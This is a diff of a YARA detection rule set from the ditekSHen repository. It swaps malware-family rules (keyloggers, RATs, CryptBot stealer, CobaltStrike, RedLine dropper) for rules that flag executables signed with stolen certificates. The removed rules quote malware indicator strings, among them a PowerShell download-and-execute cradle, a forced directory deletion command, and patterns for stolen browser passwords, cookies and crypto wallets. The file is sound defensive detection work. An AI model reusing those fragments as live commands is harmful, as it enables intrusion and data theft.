+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5682-L5693"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3feeab43b58b533b7d2d41a71f2107e6f05b9c54ff805607843d253cadbe9384"
+		logic_hash = "f6f4e551a9be96f43a81e4da69f7b312dbdc16da17659a00a3486543a9c078e9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort_sid = "920010-920012"
-		clamav_sig = "MALWARE.Win.Trojan.WSHRAT-KLG"
-
-	strings:
-		$s1 = "GET /open-keylogger HTTP/1.1" fullword wide
-		$s2 = "KeyboardChange: nCode={0}, wParam={1}, vkCode={2}, scanCode={3}, flags={4}, dwExtraInfo={6}" wide
-		$s3 = "MouseChange: nCode={0}, wParam={1}, x={2}, y={3}, mouseData={4}, flags={5}, dwExtraInfo={7}" wide
-		$s4 = "sendKeyLog" fullword ascii
-		$s5 = "saveKeyLog" fullword ascii
-		$s6 = "get_TotalKeyboardClick" fullword ascii
-		$s7 = "get_SessionMouseClick" fullword ascii
-		$pdb = "\\Android\\documents\\visual studio 2010\\Projects\\Keylogger\\Keylogger\\obj\\x86\\Debug\\Keylogger.pdb" ascii
+		thumbprint = "52ae9fdda7416553ab696388b66f645e07e753cd"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SATURDAY CITY LIMITED" and pe.signatures [ i ] . serial == "3b:00:73:14:84:4b:11:4c:61:bc:15:6a:06:09:a2:86" )
 }
-rule DITEKSHEN_MALWARE_Win_Revengerat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_262Ca7Ae19D688138E75932832B18F9D : FILE
 {
 	meta:
-		description = "RevengeRAT and variants payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7d725050-108c-54b5-978e-2dd2124f5b0f"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "891717e4-502f-5820-903c-3d9f2751a9d3"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1687-L1713"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5695-L5706"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "be9e50052f45b94d5995db723dd64d16a91c5ba0d3f589c018155c0cce45124f"
+		logic_hash = "0e6e75206bea63856e4ab07ff9b1220448f3cad6d845ae09703b9e836015520d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort_sid = "920000-920002"
-
-	strings:
-		$l1 = "Lime.Connection" fullword ascii
-		$l2 = "Lime.Packets" fullword ascii
-		$l3 = "Lime.Settings" fullword ascii
-		$l4 = "Lime.NativeMethods" fullword ascii
-		$s1 = "GetAV" fullword ascii
-		$s2 = "keepAlivePing!" fullword ascii wide
-		$s3 = "Revenge-RAT" fullword ascii wide
-		$s4 = "*-]NK[-*" fullword ascii wide
-		$s5 = "RV_MUTEX" fullword ascii wide
-		$s6 = "set_SendBufferSize" fullword ascii
-		$s7 = "03C7F4E8FB359AEC0EEF0814B66A704FC43FB3A8" fullword ascii
-		$s8 = "5B1EE7CAD3DFF220A95D1D6B91435D9E1520AC41" fullword ascii
-		$s9 = "\\RevengeRAT\\" ascii
-		$q1 = "Select * from AntiVirusProduct" fullword ascii wide
-		$q2 = "SELECT * FROM FirewallProduct" fullword ascii wide
-		$q3 = "select * from Win32_Processor" fullword ascii wide
+		thumbprint = "c5d34eb26bbb3fcb274f9e9cb37f5ae6612747a1"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $l* ) and 3 of ( $s* ) ) or ( all of ( $q* ) and 3 of ( $s* ) ) or 3 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bisoyetutu Ltd Ltd" and pe.signatures [ i ] . serial == "26:2c:a7:ae:19:d6:88:13:8e:75:93:28:32:b1:8f:9d" )
 }
-rule DITEKSHEN_MALWARE_Win_TRAT : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6B0008Bbd5Eb53F5D9E616C3Ed00000008Bbd5 : FILE
 {
 	meta:
-		description = "TRAT payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "15f80970-6bc7-5e29-86d6-f7529a10d227"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "51e670b5-a679-52ef-9c07-5a2bd21f8a20"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1715-L1730"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5708-L5719"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b8474c74cd9f21fcb3a8ae1c7a7a0a801f0f117782e9803cdae39daf7f0f8b2f"
+		logic_hash = "185334d7f484585cd88a1d89516f805d0248234a61153f8a38cc78b52d4bd764"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.TRAT"
-
-	strings:
-		$s1 = "^STEAM_0:[0-1]:([0-9]{1,10})$" fullword wide
-		$s2 = "^7656119([0-9]{10})$" fullword wide
-		$s3 = "Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)" ascii
-		$s4 = "\"schtasks\", \"/delete /tn UpdateWindows /f\");" ascii
-		$s5 = "ProcessWindowStyle.Hidden" ascii
-		$s6 = "+<>c+<<ListCommands>" ascii
-		$s7 = "//B //Nologo *Y" fullword ascii
+		thumbprint = "a24cff3a026dc6b30fb62fb01dbda704eb07164f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "microsoft.com" and pe.signatures [ i ] . serial == "6b:00:08:bb:d5:eb:53:f5:d9:e6:16:c3:ed:00:00:00:08:bb:d5" )
 }
-rule DITEKSHEN_MALWARE_Win_Cryptbot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6Abc3555Becca0Bc4B6987Ccc2Ea42B5 : FILE
 {
 	meta:
-		description = "CryptBot/Fugrafa stealer payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "248961dd-b98d-509b-92a0-1670b7687e25"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "b3ced8b8-ec42-56e4-8a3e-9cb7f6845b6f"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1732-L1766"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5721-L5732"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6322b8b1ad210fac4475c194e060046538d4174f69a7c0e3618646d262cd33bd"
+		logic_hash = "76d4895f805a6638549c2d3b01a53873156e142d741b1fc2ccc0b18971b275a7"
 		score = 75
-		quality = 44
+		quality = 75
 		tags = "FILE"
-		snort2_sid = "920110"
-		snort3_sid = "920108"
-		clamav_sig = "MALWARE.Win.Trojan.CryptBot"
-
-	strings:
-		$s1 = "Username: %wS" fullword wide
-		$s2 = "Computername: %wS" fullword wide
-		$s3 = "/c rd /s /q %" wide
-		$s4 = "IP: N0t_IP" fullword wide
-		$s5 = "Country: N0t_Country" fullword wide
-		$s6 = "password-check" fullword ascii
-		$s7 = "Content-Disposition: form-data; name=\"file\"; filename=\"" ascii wide
-		$s8 = "[ %wS ]" wide
-		$s9 = "EXE_PATH:" wide
-		$s10 = "Username (Computername):" wide
-		$s11 = "Operating system language:" wide
-		$s12 = "/index.php" wide
-		$f1 = "*ledger*.txt" fullword wide
-		$f2 = "*crypto*.xlsx" fullword wide
-		$f3 = "*private*.txt" fullword wide
-		$f4 = "*wallet*.dat" fullword wide
-		$f5 = "*pass*.txt" fullword wide
-		$f6 = "*bitcoin*.txt" fullword wide
-		$p1 = "%USERPROFILE%\\Desktop\\*.txt" fullword wide
-		$p2 = "%USERPROFILE%\\Desktop\\secret.txt" fullword wide
-		$p3 = "%USERPROFILE%\\Desktop\\report.doc" fullword wide
-		$pattern1 = /(files_|_Files)\\(_?)(cookies|cryptocurrency|forms|passwords|system_info|screenshot|screen_desktop|information|files|wallet|cc|Coinomi)\\?(\.txt|\.jpg|\.jpeg)?/ ascii wide nocase
-		$pattern2 = /%(s|ws)\\%(s|ws)\\(Login Data|Cookies|Web Data)/ fullword wide
-		$pattern3 = /(_AllPasswords_list.txt|_AllForms_list.txt|_AllCookies_list.txt|_All_CC_list.txt|_Information.txt|_Info.txt|_Screen_Desktop.jpeg)/ fullword wide
+		thumbprint = "a36c75dd80d34020df5632c2939e82d39d2dca64"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 5 of ( $s* ) and 1 of ( $p* ) ) or ( 4 of ( $s* ) and 1 of ( $f* ) and 1 of ( $p* ) ) or ( 2 of ( $pattern* ) and 3 of ( $s* ) ) or ( #pattern1 > 6 and ( 2 of ( $s* ) or 1 of ( $p* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jwkwjaagoh" and pe.signatures [ i ] . serial == "6a:bc:35:55:be:cc:a0:bc:4b:69:87:cc:c2:ea:42:b5" )
 }
-rule DITEKSHEN_MALWARE_Win_Matiex : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3C5Fc5D02273F297404F7B9306E447Bb : FILE
 {
 	meta:
-		description = "Matiex/XetimaLogger keylogger payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "61803e0c-8f6a-5ded-855a-ff26eed1384f"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "2dd0805d-f43e-5aec-a0d9-98fc9fa6c088"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1768-L1788"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5734-L5745"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "62b45c43d99bef93a6c0e72200b869fdce331f8fa325640df7d8b72af56a3ef2"
+		logic_hash = "e73fd0a38c76783e3110abe82411cc3d22fbbc95684667dc754618f590f29970"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.MatiexKeylogger"
-
-	strings:
-		$id = "--M-A-T-I-E-X--K-E-Y-L-O-G-E-R--" ascii wide
-		$s1 = "StartKeylogger" fullword ascii
-		$s2 = "_KeyboardLoggerTimer" ascii
-		$s3 = "_ScreenshotLoggerTimer" ascii
-		$s4 = "_VoiceRecordLogger" ascii
-		$s5 = "_ClipboardLoggerTimer" ascii
-		$s6 = "get_logins" fullword ascii
-		$s7 = "get_processhackerFucked" fullword ascii
-		$s8 = "_ThePSWDSenders" fullword ascii
-		$pdb = "\\Before FprmT\\Document VB project\\FireFox Stub\\FireFox Stub\\obj\\Debug\\VNXT.pdb" ascii
+		thumbprint = "3fa4a6efd5e443627e9e32e6effe04c991f4fe8f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $id or 4 of ( $s* ) or ( $pdb and 2 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wirpool Soft" and pe.signatures [ i ] . serial == "3c:5f:c5:d0:22:73:f2:97:40:4f:7b:93:06:e4:47:bb" )
 }
-rule DITEKSHEN_MALWARE_Win_Iamthekingkeylogger : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_7D36Cbb64Bc9Add17Ba71737D3Ecceca : FILE
 {
 	meta:
-		description = "IAmTheKing Keylogger payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f9c84241-6db2-5243-9bea-2165104cb0c3"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "23786dd4-2ad2-5d86-a0d2-46bc5f1825eb"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1790-L1805"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5763-L5774"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "80d8cabfd02cd73e19e6cf1c2a8a5f06c5b3b502fe4f07289e92b448425aaa6d"
+		logic_hash = "070600994d7e137a769432e7c5995dac90f01cbce2c50de4c5baecea5d556baf"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.IAmTheKingKeylogger"
-
-	strings:
-		$s1 = "[TIME:]%d/%d/%d %02d:%02d:%02d" fullword ascii
-		$s2 = "[TITLE:]" fullword ascii
-		$s3 = "%s-%02d-%02d-%02d-%02d" fullword ascii
-		$s4 = "[DATA]:" fullword ascii
-		$s5 = "[BK]" fullword ascii
-		$s6 = "Log.txt" fullword ascii
-		$s7 = "sonme hting is wrong x" fullword ascii
+		thumbprint = "a7287460dcf02e38484937b121ce8548191d4e64"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LTD SERVICES LIMITED" and pe.signatures [ i ] . serial == "7d:36:cb:b6:4b:c9:ad:d1:7b:a7:17:37:d3:ec:ce:ca" )
 }
-rule DITEKSHEN_MALWARE_Win_Iamthekingscrcap : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Df7139E106Dbb68Dfe4De97D862Af708 : FILE
 {
 	meta:
-		description = "IAmTheKing screen capture payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ba385194-9578-568c-b908-bc4fc742e52e"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "8da7c163-02a7-571e-a995-c1d500d90b5b"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1807-L1821"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5776-L5787"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "594ddad4e08bad51f90de1c4299e28b4800b4fa686bd4176e406ba401a1242ba"
+		logic_hash = "503ff5f570191ac61a20c2a6ffa5117d5c3ed632c04c4a02c710644c18a494d0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "@MyScreen.jpg" fullword wide
-		$s2 = "DISPLAY" fullword wide
-		$s3 = ".?AVCImage@ATL@@" fullword ascii
-		$s4 = ".?AVGdiplusBase@Gdiplus@@" fullword ascii
-		$s5 = ".?AVImage@Gdiplus@@" fullword ascii
-		$s6 = ".?AVBitmap@Gdiplus@@" fullword ascii
-		$s7 = ".?AVCAtlException@ATL@@" fullword ascii
+		thumbprint = "4ac627227a25f0914f3a73ff85d90b45da589329"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "zPfPJHDCzusZRYQYJZGZoFfZmvYtSlFXDPQKtoQzc" and pe.signatures [ i ] . serial == "00:df:71:39:e1:06:db:b6:8d:fe:4d:e9:7d:86:2a:f7:08" )
 }
-rule DITEKSHEN_MALWARE_Win_Iamthekingkingofhearts : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D4F9Fc08895654F8Bde8D1Cc26Eff015 : FILE
 {
 	meta:
-		description = "IAmTheKing King Of Hearts payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "95c73ec0-75b0-5d46-87da-b30feb170716"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "d32f82a7-36dd-555f-87cf-28e520a3916f"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1823-L1843"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5789-L5800"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "75b6dd0ebb90fd04f9e4a0b1fc6a1bbf417fc66daad24c8b01f0390f6155ec55"
+		logic_hash = "dfc90ce9c1d8a0fad9c50f61c90c4f7b00b6890ee45d218417f4a7196c3d1c18"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "write info fail!!! GetLastError-->%u" fullword ascii
-		$s2 = "LookupAccountSid Error %u" fullword ascii
-		$s3 = "CreateServiceErrorID:%d" fullword ascii
-		$s4 = "In ControlServiceErrorID:%d" fullword ascii
-		$s5 = "In QueryServiceStatus ErrorID:%d" fullword ascii
-		$s6 = "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"" fullword ascii
-		$s7 = "hello%s" fullword ascii
-		$s8 = "additional header failed..." fullword ascii
-		$s9 = "Set Option failed errcode: %ld" fullword ascii
-		$s10 = "add cookie failed..." fullword ascii
-		$u1 = "Mozilla/4.0 (compatible; )" fullword ascii
-		$u2 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)" fullword ascii
+		thumbprint = "f24af3a784c2316b42854c5853b53d9e556295f7"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $u* ) and 4 of ( $s* ) ) or ( all of ( $u* ) and 3 of ( $s* ) ) or ( 5 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "kfbdAfVnDMDc" and pe.signatures [ i ] . serial == "00:d4:f9:fc:08:89:56:54:f8:bd:e8:d1:cc:26:ef:f0:15" )
 }
-rule DITEKSHEN_MALWARE_Win_Cobaltstrike : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0393Be7Fd785Ba0E3223A73B15Ee6736 : FILE
 {
 	meta:
-		description = "CobaltStrike payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "140e16d0-0102-5650-a371-c95013d7f021"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "852c3c5c-e20c-5e45-acee-7f5a5a35fa24"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1845-L1864"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5802-L5813"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "43513aef0ed715f0c214d7a14e465350f9c1bcadf87535e1c12561e976398bb3"
+		logic_hash = "6805b2d04f8b89b9d4db8d47d74e83b6cdd7e778b038883fc8d3ef2e1b157070"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "%%IMPORT%%" fullword ascii
-		$s2 = "www6.%x%x.%s" fullword ascii
-		$s3 = "cdn.%x%x.%s" fullword ascii
-		$s4 = "api.%x%x.%s" fullword ascii
-		$s5 = "%s (admin)" fullword ascii
-		$s6 = "could not spawn %s: %d" fullword ascii
-		$s7 = "Could not kill %d: %d" fullword ascii
-		$s8 = "Could not connect to pipe (%s): %d" fullword ascii
-		$s9 = /%s\.\d[(%08x).]+\.%x%x\.%s/ ascii
-		$pwsh1 = "IEX (New-Object Net.Webclient).DownloadString('http" ascii
-		$pwsh2 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
+		thumbprint = "f50fc532839ca7e63315e468c493512db8b7ee83"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( all of ( $pwsh* ) and 2 of ( $s* ) ) or ( #s9 > 6 and 4 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FZaKundypKakCIvoMBPpTnwIDUJM" and pe.signatures [ i ] . serial == "03:93:be:7f:d7:85:ba:0e:32:23:a7:3b:15:ee:67:36" )
 }
-rule DITEKSHEN_MALWARE_Win_Redlinedropperahk : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_008B7369B2F0C313634A1C1Dfc4A828A54 : FILE
 {
 	meta:
-		description = "Detects AutoIt/AutoHotKey executables dropping RedLine infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "16eee826-f1fd-5a6f-b6f3-e02ccd889614"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "e4da4da0-68f1-548b-b307-e11ad6def316"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1866-L1878"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5815-L5826"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0950fe9daa02f3a8fd527f75275766111be7e8774578963b0bdb455800dfc4f9"
+		logic_hash = "857eaa56ff5106e3808750b8833fd33a328b53a04f6fd2939aca30dbc6048329"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.RedLineDropper-AHK"
-
-	strings:
-		$s1 = ".SetRequestHeader(\"User-Agent\",\" ( \" OSName \" | \" bit \" | \" CPUNAme \"\"" ascii
-		$s2 = ":= \" | Windows Defender\"" ascii
-		$s3 = "WindowSpy.ahk" wide
-		$s4 = ">AUTOHOTKEY SCRIPT<" fullword wide
+		thumbprint = "1cad5864bcc0f6aa20b99a081501a104b633dddd"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LFpKdFUgpGKj" and pe.signatures [ i ] . serial == "00:8b:73:69:b2:f0:c3:13:63:4a:1c:1d:fc:4a:82:8a:54" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent01 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_59A57E8Ba3Dcf2B6F59981Fda14B03 : FILE
 {
 	meta:
-		description = "Detects known downloader agent"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "85ead6fd-b56e-5e78-8fb4-7c9ecb4c0b58"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "07e68e53-ffb8-5f12-ad0e-cf64a3c9cb72"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1880-L1894"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5828-L5841"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7aec81655af9b779a314c3e2cff933aa6426fcfe21b5a87e60e159c7e7f5238a"
+		logic_hash = "1eeeef14502daafb303d1c09d8e55fb4df57a6bf250d1adc7e53862f2f5d5824"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort_sid = "920007"
-		clamav_sig = "MALWARE.Win.Trojan.DLAgent01"
-
-	strings:
-		$s1 = "Mozilla/5.0 Gecko/41.0 Firefox/41.0" fullword wide
-		$s2 = "/Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List" fullword wide
-		$s3 = "GUID.log" fullword wide
-		$s4 = "NO AV" fullword wide
-		$s5 = "%d:%I64d:%I64d:%I64d" fullword wide
+		thumbprint = "e201821e152d7ae86078c4e6a3a3a1e1c5e29f9a"
+		hash1 = "d9ace2d97010316fdb0f416920232e8d4c59b01614633c4d5def79abb15d0175"
+		hash2 = "80e363dee08f4f77e5a061c10f18503c7ce802818cf6bb1c8a16da0ba3877b01"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Medium LLC" and pe.signatures [ i ] . serial == "59:a5:7e:8b:a3:dc:f2:b6:f5:99:81:fd:a1:4b:03" )
 }
-rule DITEKSHEN_MALWARE_Linux_PLEAD : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00C79F817F082986Bef3209F6723C8Da97 : FILE
 {
 	meta:
-		description = "PLEAD Linux payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "07aa0561-d6d9-53b6-97ac-670cdf04335d"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "2e831cd7-6992-5b5f-ad84-52590f3cc65a"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1896-L1920"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5843-L5856"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "539998248ded0eb8ea1702c527804f89cfd55412f17ec699bd0af801f4fba673"
+		logic_hash = "b6dd9cb0d2383bce3ab13b6a660b3f5ba554a2bf1fce4aabb6dd36187cc57f45"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Linux.Trojan.PLEAD"
-
-	strings:
-		$x1 = "CFileTransfer" ascii
-		$x2 = "CFileManager" ascii
-		$x3 = "CPortForward" ascii
-		$x4 = "CPortForwardManager" ascii
-		$x5 = "CRemoteShell" ascii
-		$x6 = "CSockClient" ascii
-		$s1 = "/proc/self/exe" fullword ascii
-		$s2 = "/bin/sh" fullword ascii
-		$s3 = "echo -e '" ascii
-		$s4 = "%s    <DIR>    %s" ascii
-		$s5 = "%s    %lld    %s" ascii
-		$s6 = "Files: %d        Size: %lld" ascii
-		$s7 = "Dirs: %d" ascii
-		$s8 = "%s(%s)/" ascii
-		$s9 = "%s %s %s %s" ascii
+		thumbprint = "e2bf86dc46fca1c35f98ff84d8976be8aa0668bc"
+		hash1 = "dd49651e325b04ea14733bcd676c0a1cb58ab36bf79162868ade02b396ec3ab0"
+		hash2 = "823cb4b92a1266c880d917c7d6f71da37d524166287b30c0c89b6bb03c2e4b64"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x457f and ( all of ( $x* ) or all of ( $s* ) or 12 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Al-Faris group d.o.o." and pe.signatures [ i ] . serial == "00:c7:9f:81:7f:08:29:86:be:f3:20:9f:67:23:c8:da:97" )
 }
-rule DITEKSHEN_MALWARE_Win_CRAT : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Beb721Fcb3274C984479D6554Efe8F49 : FILE
 {
 	meta:
